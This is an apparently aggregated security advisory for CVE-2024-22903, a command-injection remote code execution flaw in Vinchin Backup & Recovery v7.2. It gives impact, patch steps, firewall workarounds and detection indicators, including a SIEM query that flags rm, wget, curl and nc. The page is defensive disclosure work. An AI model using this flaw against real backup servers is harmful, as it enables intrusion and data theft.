CVE-2024-22903
📋 TL;DR
Vinchin Backup & Recovery v7.2 contains an authenticated remote code execution vulnerability in the deleteUpdateAPK function. This allows authenticated attackers to execute arbitrary commands on the server. Organizations using Vinchin Backup & Recovery v7.2 are affected.
💻 Affected Systems
- Vinchin Backup & Recovery
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Complete system compromise allowing attackers to execute arbitrary commands, steal data, deploy ransomware, or pivot to other systems in the network.
Likely Case
Attackers with valid credentials can execute commands to exfiltrate backup data, install malware, or create persistent access.
If Mitigated
With proper network segmentation and least privilege access, impact could be limited to the backup system itself.
🎯 Exploit Status
Exploit code is publicly available and requires only authenticated access. The vulnerability is actively being exploited.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: v7.2 Hotfix or later
Vendor Advisory: http://vinchin.com
Restart Required: Yes
Instructions:
1. Download the latest patch from Vinchin official website. 2. Backup current configuration. 3. Apply the patch following vendor instructions. 4. Restart the Vinchin Backup & Recovery service.
🔧 Temporary Workarounds
Restrict Access
linuxLimit network access to Vinchin Backup & Recovery management interface to trusted IPs only.
iptables -A INPUT -p tcp --dport [Vinchin_port] -s [trusted_IP] -j ACCEPT
iptables -A INPUT -p tcp --dport [Vinchin_port] -j DROP
Disable Unused Functions
linuxIf update functionality is not needed, disable the update service component.
systemctl stop vinchin-update
systemctl disable vinchin-update
🧯 If You Can't Patch
- Isolate the Vinchin Backup & Recovery system in a separate network segment with strict firewall rules.
- Implement multi-factor authentication and strong password policies for all Vinchin administrative accounts.
🔍 How to Verify
Check if Vulnerable:
Check if Vinchin Backup & Recovery version is 7.2. Look for the vulnerable deleteUpdateAPK function in SystemHandler.class.php.Check Version:
Check Vinchin web interface admin panel or run: cat /usr/local/vinchin/version.txtVerify Fix Applied:
Verify the patch has been applied by checking the version is updated to v7.2 Hotfix or later. Test the deleteUpdateAPK function with safe payloads.📡 Detection & Monitoring
Log Indicators:
- Unusual commands executed via Vinchin web interface
- Multiple failed authentication attempts followed by successful login
- Suspicious file operations in Vinchin directories
Network Indicators:
- Unusual outbound connections from Vinchin server
- Traffic to known malicious IPs from Vinchin system
SIEM Query:
source="vinchin.log" AND (command="rm" OR command="wget" OR command="curl" OR command="nc")🔗 References
- http://vinchin.com
- https://blog.leakix.net/2024/01/vinchin-backup-rce-chain/
- https://seclists.org/fulldisclosure/2024/Jan/32
- http://packetstormsecurity.com/files/176796/Vinchin-Backup-And-Recovery-7.2-SystemHandler.class.php-Command-Injection.html
- http://seclists.org/fulldisclosure/2024/Jan/32
- http://vinchin.com
- https://blog.leakix.net/2024/01/vinchin-backup-rce-chain/
- https://seclists.org/fulldisclosure/2024/Jan/32
